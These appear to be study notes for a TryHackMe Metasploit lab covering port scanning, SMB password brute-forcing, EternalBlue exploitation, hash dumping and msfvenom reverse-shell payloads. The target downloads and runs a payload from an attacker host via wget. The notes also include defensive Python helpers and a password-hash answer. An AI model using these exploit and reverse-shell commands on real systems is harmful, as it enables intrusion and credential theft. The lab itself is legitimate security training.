
In this room, we will learn how to use Metasploit for vulnerability scanning and exploitation. We will also cover how the database feature makes it easier to manage penetration testing engagements with a broader scope. Finally, we will look at generating payloads with msfvenom and how to start a session on most target platforms.
Please note that for all questions that require using a wordlist (e.g. brute-force attacks), we will be using the wordlist on the AttackBox found at the following path:
/usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
STEP 1: START METASPLOIT
STEP 2: CHECK FOR PORT SCANNER COMPONENTS
1. auxiliary/scanner/portscan/tcp (No. 5)
This is the most common scan type.
Function: Performs a full 3-way handshake (SYN → SYN-ACK → ACK)
Logic: If the connection completes, the port is open
Disadvantage: Easily detected in server logs because it creates a full connection
2. auxiliary/scanner/portscan/syn (No. 6)
Also known as Stealth Scan or Half-Open Scan
Function: Sends SYN, and if SYN-ACK is received, sends RST to terminate the connection early
Logic: Checks port status without fully establishing a connection
Advantage: Harder to detect compared to full TCP scan (especially on older firewalls)
3. auxiliary/scanner/portscan/ack (No. 4)
Used for firewall detection, not for finding open ports
Function: Sends an ACK packet pretending a connection already exists
Logic:
If RST is received → port is unfiltered
If no response → port is filtered (firewall present)
4. auxiliary/scanner/portscan/xmas (No. 3)
Called Xmas scan because it sets multiple flags (like "lights")
Function: Sends packets with FIN, PSH, and URG flags all set
Logic:
Closed port → sends RST
Open port → no response
Note: Not reliable on Windows (Windows sends RST for everything)
5. auxiliary/scanner/portscan/ftpbounce (No. 0)
An older but clever technique
Function: Uses a third-party FTP server to perform the scan
Logic: Hides your real IP address
Advantage: Target sees traffic coming from the FTP server, not from you
🔑 Summary
TCP → Full connection (loud)
SYN → Half-open (stealth)
ACK → Firewall detection
Xmas → Flag-based scan (limited use)
FTP Bounce → Indirect scanning (IP hiding)
Again, use nmap inside Metasploit to scan the target.
Answer: port = 5
Again: how to find the NetBIOS name?
Use auxiliary/scanner/discovery/udp_sweep:
msf > use auxiliary/scanner/discovery/udp_sweep
msf auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 10.129.161.21
RHOSTS => 10.129.161.21
msf auxiliary(scanner/discovery/udp_sweep) > run
[*] Sending 13 probes to 10.129.161.21->10.129.161.21 (1 hosts)
[*] Discovered NetBIOS on 10.129.161.21:137 (__MSBROWSE__:<01>:G ::<00>:U ::<03>:U ::<20>:U :ACME IT SUPPORT:<00>:G :ACME IT SUPPORT:<1d>:U :ACME IT SUPPORT:<1e>:G :00:00:00:00:00:00)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/discovery/udp_sweep) >
Answer: ACME IT SUPPORT
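The discovery line above packs the whole NetBIOS name table into one string; the parser below is an added example (not part of these notes or of Metasploit) that splits it into name, suffix and unique/group type, maps each suffix to the service it advertises, and picks out the workgroup name even when the host's own <00> entry is blank, as it is here. The SUFFIX_ROLES table, the function names and the copy of the sample line are mine.

```python
import re
from typing import Dict, List, Optional
# The discovery line from the udp_sweep run above, copied here as the sample input.
SAMPLE = ("[*] Discovered NetBIOS on 10.129.161.21:137 (__MSBROWSE__:<01>:G ::<00>:U "
          "::<03>:U ::<20>:U :ACME IT SUPPORT:<00>:G :ACME IT SUPPORT:<1d>:U "
          ":ACME IT SUPPORT:<1e>:G :00:00:00:00:00:00)")

# NetBIOS name-table suffixes keyed by (suffix, U = unique name / G = group name).
SUFFIX_ROLES = {
    ("00", "U"): "Workstation Service (host name)",
    ("00", "G"): "Domain / workgroup name",
    ("03", "U"): "Messenger Service",
    ("20", "U"): "File Server Service (host offers SMB shares)",
    ("1d", "U"): "Master Browser",
    ("1e", "G"): "Browser Service Elections",
    ("01", "G"): "Master Browser announcement (__MSBROWSE__)",
}

HEADER_RE = re.compile(r"Discovered NetBIOS on (\S+):(\d+) \((.*)\)\s*$")
# Entries look like NAME:<SUFFIX>:TYPE joined by " :"; NAME may be empty.
ENTRY_RE = re.compile(r"(?:^|\s:)([^:]*):<([0-9a-fA-F]{2})>:([UG])")
MAC_RE = re.compile(r":([0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5})$")


def parse_netbios_line(line: str) -> Optional[Dict]:
    """Turn one udp_sweep NetBIOS line into ip, port, name entries and MAC."""
    m = HEADER_RE.search(line)
    if not m:
        return None  # some other module output line
    ip, port, body = m.group(1), int(m.group(2)), m.group(3)
    names: List[Dict] = []
    for name, suffix, kind in ENTRY_RE.findall(body):
        key = (suffix.lower(), kind)
        names.append({"name": name.strip(), "suffix": key[0], "type": kind,
                      "role": SUFFIX_ROLES.get(key, "unknown")})
    mac = MAC_RE.search(body)
    return {"ip": ip, "port": port, "names": names,
            "mac": mac.group(1) if mac else None}


def workgroup_name(record: Dict) -> Optional[str]:
    """Prefer the <00> group entry; the host's own <00> unique entry is a fallback."""
    for want in ("G", "U"):
        for e in record["names"]:
            if e["suffix"] == "00" and e["type"] == want and e["name"]:
                return e["name"]
    return None


def offers_file_sharing(record: Dict) -> bool:
    """A <20> unique entry means the File Server Service is registered."""
    return any(e["suffix"] == "20" and e["type"] == "U" for e in record["names"])
```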
AGAIN: WHICH SERVICES ARE RUNNING?
SMB
We see port 445 is open, so we go after SMB with the login scanner.
COMMAND USED:
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.129.161.21
set SMBUser penny
set PASS_FILE /usr/share/wordlists/metasploit/common_passwords.txt
set THREADS 16
set STOP_ON_SUCCESS true
run
password =
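From the defender's side, a run like the smb_login one above leaves a distinctive trace in the target's Security log: a burst of failed network logons (event 4625, logon type 3) for one account from one source, then a single success (4624) when STOP_ON_SUCCESS fires. The detector below is an added example (not from these notes or any product); the log lines are constructed and reduced to five fields, and the threshold and window are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Tuple

FAIL, SUCCESS = "4625", "4624"  # Windows Security: failed / successful logon

def _ts(seconds: float) -> str:
    return (datetime(2024, 5, 1, 10, 0, 0) + timedelta(seconds=seconds)).isoformat()

# Constructed sample, not real logs: "<time> <event_id> <logon_type> <user> <source_ip>".
# A 16-thread smb_login run shows up as a burst of type-3 (network) 4625s for one
# account from one source; with STOP_ON_SUCCESS it ends in a single 4624 and stops.
SAMPLE_LOG = [f"{_ts(i * 0.25)} {FAIL} 3 penny 10.10.14.5" for i in range(40)]
SAMPLE_LOG.append(f"{_ts(10.5)} {SUCCESS} 3 penny 10.10.14.5")
SAMPLE_LOG.append(f"{_ts(30)} {FAIL} 3 bob 10.10.14.9")   # one mistyped password
SAMPLE_LOG.append(f"{_ts(31)} {FAIL} 2 penny 10.10.14.5")  # console logon, not SMB

def detect_smb_bruteforce(lines: List[str], threshold: int = 10,
                          window_s: int = 60) -> List[Dict]:
    """Alert when one source IP collects >= threshold network-logon failures against
    one account inside a sliding window; escalate if that pair then logs on."""
    recent: Dict[Tuple[str, str], Deque[datetime]] = defaultdict(deque)
    alerts: Dict[Tuple[str, str], Dict] = {}
    for line in lines:
        when, event_id, logon_type, user, src = line.split()
        if logon_type != "3":
            continue  # only network logons can come from smb_login
        ts = datetime.fromisoformat(when)
        key = (src, user)
        if event_id == FAIL:
            q = recent[key]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()
            if key in alerts:
                alerts[key]["failures"] += 1
            elif len(q) >= threshold:
                alerts[key] = {"source": src, "user": user, "failures": len(q),
                               "first_seen": q[0].isoformat(), "severity": "medium",
                               "success_after": False}
        elif event_id == SUCCESS and key in alerts:
            alerts[key]["success_after"] = True
            alerts[key]["severity"] = "high"  # password found, session likely live
    return list(alerts.values())
```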
POSTGRESQL DB
How to connect PostgreSQL with msfconsole
🎯 Purpose of Connecting PostgreSQL to Metasploit
The connection between PostgreSQL and Metasploit (msfconsole) is done to enable data storage, management, and automation during penetration testing.
🔑 Why This Connection Is Important
1. Store Scan Results
- All data from tools like db_nmap is saved in the database
- Includes:
- Hosts (IPs)
- Open ports
- Services
- OS detection
👉 Without PostgreSQL, results disappear after you exit Metasploit
Now go to the msf console; it should look like this.
Continue with scanning:
db_nmap -sV -Pn -p- -T4 -vv 10.129.161.21
After that, use hosts and services.
# Start PostgreSQL service (database required by Metasploit)
systemctl start postgresql
# Initialize Metasploit database as postgres user (creates DB, users, schema)
sudo -u postgres msfdb init
# Launch Metasploit console
msfconsole
# Check if Metasploit is connected to PostgreSQL database
db_status
# List all available workspaces (project environments)
workspace
# Create a new workspace named "tryhackme"
workspace -a tryhackme
# Switch to the "tryhackme" workspace
workspace tryhackme
# Run Nmap scan (detect services + scan all 65535 ports, save results to DB)
db_nmap -sV -p- 10.129.161.21
# Display all discovered hosts stored in the database
hosts
# Display all discovered services and open ports
services
# Search for a specific service (e.g., NetBIOS) in stored results
services -S netbios
# Load SMB vulnerability scanner module (MS17-010 / EternalBlue check)
use auxiliary/scanner/smb/smb_ms17_010
# Automatically set RHOSTS using saved hosts from database
hosts -R
# Show module options and verify configuration
show options
# Run the scanner module
run
VULNERABILITY SCANNING
EXPLOIT
Step 1: scan for vulnerabilities
🔍 1. Basic Connectivity
ping 10.130.139.221 # check whether the target is reachable
🔎 2. Full Port Scan
nmap -p- -Pn 10.130.139.221 # scan all ports (full enumeration)
🔬 3. Service & Version Detection
nmap -sV -sC -Pn 10.130.139.221 # detect services + default scripts
🚨 4. General Vulnerability Scan
nmap -sV --script vuln -Pn 10.130.139.221 # scan for all vulnerabilities
🎯 5. SMB Specific Scan
nmap -p445 --script smb-vuln* -Pn 10.130.139.221 # all SMB vulnerabilities
💥 6. Confirm MS17-010 (Targeted)
nmap -p445 --script smb-vuln-ms17-010 -Pn 10.130.139.221 # confirm EternalBlue
🚀 7. Start Metasploit
msfconsole # launch metasploit
🎯 8. Load Exploit
use exploit/windows/smb/ms17_010_eternalblue # EternalBlue exploit
⚙️ 9. Configure Target
set RHOSTS 10.130.139.221 # target IP
set LHOST 192.168.140.247 # your VPN IP (tun0)
set LPORT 4444 # listening port
📡 10. Set Payload
set payload windows/x64/meterpreter/reverse_tcp # meterpreter reverse shell
🔧 11. Stability Options
set ExitOnSession false # continue even after fail
set VERIFY_ARCH false # skip arch checks
set VERIFY_TARGET false # skip target checks
💣 12. Run Exploit
exploit # run attack
exploit # repeat if it fails (important)
🔁 13. Alternative Exploit (if the first one fails)
use exploit/windows/smb/ms17_010_psexec # alternative stable exploit
set RHOSTS 10.130.139.221
set LHOST 192.168.140.247
exploit
🎯 14. Session Management
sessions # list sessions
sessions -i 1 # interact with session
📂 15. Find Flag
dir C:\\ /s | findstr flag # search flag files
type C:\\Users\\*\\Desktop\\flag.txt # read flag
🔐 16. Dump Hashes
hashdump # dump NTLM hashes
Command:
nmap -p445 -Pn --script smb-vuln-ms17-010 10.130.139.221
run exploit
flag
MSFVENOM
Target: TryHackMe VM — 10.130.139.221
Attacker: Your AttackBox — 192.168.140.247
1. Generate Meterpreter Payload
On your AttackBox, run:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.140.247 LPORT=4444 -f elf > shell.elf
chmod +x shell.elf
- -p linux/x86/meterpreter/reverse_tcp → sets payload type
- LHOST → your AttackBox IP
- LPORT → port to listen on (same for handler)
- -f elf → Linux executable format
2. Serve the Payload
Start a Python HTTP server to make the payload downloadable:
python3 -m http.server 9000
- Payload URL will be:
http://192.168.140.247:9000/shell.elf
3. Start the Metasploit Handler
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.140.247
set LPORT 4444
run
- This listens for incoming connections from the payload
- Must match the LHOST and LPORT used in msfvenom
4. Deploy Payload on Target
On the target machine (VM):
wget http://192.168.140.247:9000/shell.elf
chmod +x shell.elf
./shell.elf
- This triggers the reverse connection back to your handler
5. Catch the Meterpreter Session
Back on the attacker terminal (Metasploit handler), you should see:
[*] Started reverse TCP handler on 192.168.140.247:4444
[*] Meterpreter session 1 opened
- You now have interactive access to the target machine
6. Post Exploitation
- List users and hashes:
hashdump
- Retrieve other users' password hashes for further analysis
Notes / Tips
- Minimum 2 terminals needed:
  msfconsole (handler)
  python3 -m http.server (payload delivery)
- Optionally, a 3rd terminal for target machine commands
- Ensure LHOST and LPORT match between msfvenom and the handler
- Payload must be executable on the target
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
Python:
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
ANSWER = $6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
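The notes stress that LHOST and LPORT must match between msfvenom and the handler, and the table pairs each payload family with an output format; this added example (mine, not from the notes or from Metasploit) parses both sides and reports any mismatch before anything is run. The FORMAT_FOR_FAMILY table encodes only the pairings listed in this section, and the function names are assumptions.

```python
import re
import shlex
from typing import Dict, List

# Inputs copied from the walkthrough above: the msfvenom command and the
# handler's "set" lines. Function names and the format table are mine.
MSFVENOM_CMD = ("msfvenom -p linux/x86/meterpreter/reverse_tcp "
                "LHOST=192.168.140.247 LPORT=4444 -f elf > shell.elf")
HANDLER_RC = """use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.140.247
set LPORT 4444
run"""

# Output format each payload family is paired with in the table above.
FORMAT_FOR_FAMILY = {"linux": {"elf"}, "windows": {"exe", "asp"},
                     "php": {"raw"}, "cmd": {"raw"}}

def parse_msfvenom(cmd: str) -> Dict[str, str]:
    """Collect -p, -f and KEY=VALUE options from an msfvenom command line."""
    toks = shlex.split(cmd)
    out: Dict[str, str] = {}
    for i, t in enumerate(toks):
        if t == "-p" and i + 1 < len(toks):
            out["PAYLOAD"] = toks[i + 1]
        elif t == "-f" and i + 1 < len(toks):
            out["FORMAT"] = toks[i + 1]
        elif "=" in t:
            k, v = t.split("=", 1)
            out[k.upper()] = v
    return out

def parse_handler(rc: str) -> Dict[str, str]:
    """Collect 'set KEY VALUE' lines from a multi/handler resource script."""
    return {m.group(1).upper(): m.group(2)
            for m in re.finditer(r"^\s*set\s+(\S+)\s+(\S+)\s*$", rc, re.M)}

def check_handler_matches(venom: Dict[str, str], handler: Dict[str, str]) -> List[str]:
    """Return the mismatches between payload and handler; empty means consistent."""
    problems = []
    for key in ("PAYLOAD", "LHOST", "LPORT"):
        if venom.get(key) != handler.get(key):
            problems.append(f"{key}: msfvenom={venom.get(key)!r} handler={handler.get(key)!r}")
    family = venom.get("PAYLOAD", "").split("/")[0]
    fmt = venom.get("FORMAT")
    if family in FORMAT_FOR_FAMILY and fmt not in FORMAT_FOR_FAMILY[family]:
        problems.append(f"FORMAT: {fmt!r} is not paired with {family} payloads above")
    return problems
```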
HAPPY HACKING